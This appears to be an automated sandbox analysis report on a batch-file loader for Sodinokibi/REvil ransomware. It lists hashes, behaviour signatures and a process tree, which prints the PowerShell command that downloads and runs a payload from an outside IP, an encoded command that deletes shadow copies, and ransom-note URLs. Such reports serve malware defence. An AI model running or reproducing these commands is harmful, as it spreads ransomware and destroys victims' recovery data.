Analysis
-
max time kernel
138s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
12-06-2020 00:10
Static task
static1
Behavioral task
behavioral1
Sample
315ea3e45ed9d73cb511afb5ad1e2d86.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
315ea3e45ed9d73cb511afb5ad1e2d86.bat
Resource
win10v200430
General
-
Target
315ea3e45ed9d73cb511afb5ad1e2d86.bat
-
Size
213B
-
MD5
9ffed33cd2f438b612e85a2525de7fb6
-
SHA1
712f155efba4999bf546e2848347b572bce27b14
-
SHA256
2674c1819c1820eb2c521770cb16fa5b47068ce9fbfa8eacf33d4ce56b08e170
-
SHA512
6378aa3c586fb010b39411f4f1f34d6bbf9266f8a86827f6128c367298d7a295acd59fc72a318df3e5dfae8bb95248b5d8aa5330052bc7064f7b949016b2fafb
Malware Config
Extracted
http://185.103.242.78/pastes/315ea3e45ed9d73cb511afb5ad1e2d86
Extracted
C:\u0s64btn42-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/396850071A9D3213
http://decryptor.cc/396850071A9D3213
Signatures
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3uw6ld.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 868 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1520 wrote to memory of 868 1520 cmd.exe powershell.exe PID 868 wrote to memory of 1808 868 powershell.exe powershell.exe PID 868 wrote to memory of 1808 868 powershell.exe powershell.exe PID 868 wrote to memory of 1808 868 powershell.exe powershell.exe PID 868 wrote to memory of 1808 868 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeBackupPrivilege 784 vssvc.exe Token: SeRestorePrivilege 784 vssvc.exe Token: SeAuditPrivilege 784 vssvc.exe Token: SeTakeOwnershipPrivilege 868 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 868 powershell.exe 868 powershell.exe 868 powershell.exe 1808 powershell.exe 1808 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 868 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ClearUnlock.snd powershell.exe File opened for modification \??\c:\program files\RedoRestart.asf powershell.exe File opened for modification \??\c:\program files\SkipExpand.ttc powershell.exe File opened for modification \??\c:\program files\WatchSync.vb powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\u0s64btn42-readme.txt powershell.exe File created \??\c:\program files\u0s64btn42-readme.txt powershell.exe File opened for modification \??\c:\program files\DebugConnect.shtml powershell.exe File opened for modification \??\c:\program files\UnblockExpand.dot powershell.exe File opened for modification \??\c:\program files\UseWait.mpeg powershell.exe File opened for modification \??\c:\program files\WatchLimit.jpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\u0s64btn42-readme.txt powershell.exe File opened for modification \??\c:\program files\CloseCompare.001 powershell.exe File opened for modification \??\c:\program files\MergePop.gif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\u0s64btn42-readme.txt powershell.exe File opened for modification \??\c:\program files\NewMount.3gpp powershell.exe File opened for modification \??\c:\program files\PushPop.MTS powershell.exe File opened for modification \??\c:\program files\SyncExit.TS powershell.exe File opened for modification \??\c:\program files\RegisterGet.mp4 powershell.exe File created \??\c:\program files (x86)\u0s64btn42-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointNew.pcx powershell.exe File opened for modification \??\c:\program files\ConvertFromCompare.aiff powershell.exe File opened for modification \??\c:\program files\DenyAssert.3gp2 powershell.exe File opened for modification \??\c:\program files\InitializeSubmit.vstm powershell.exe File opened for modification \??\c:\program files\MountCopy.docx powershell.exe File opened for modification \??\c:\program files\ProtectRevoke.xla powershell.exe File opened for modification \??\c:\program files\RenameSplit.gif powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\315ea3e45ed9d73cb511afb5ad1e2d86.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/315ea3e45ed9d73cb511afb5ad1e2d86');Invoke-NLIWNW;Start-Sleep -s 10000"2⤵
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
PID:868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1808
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:784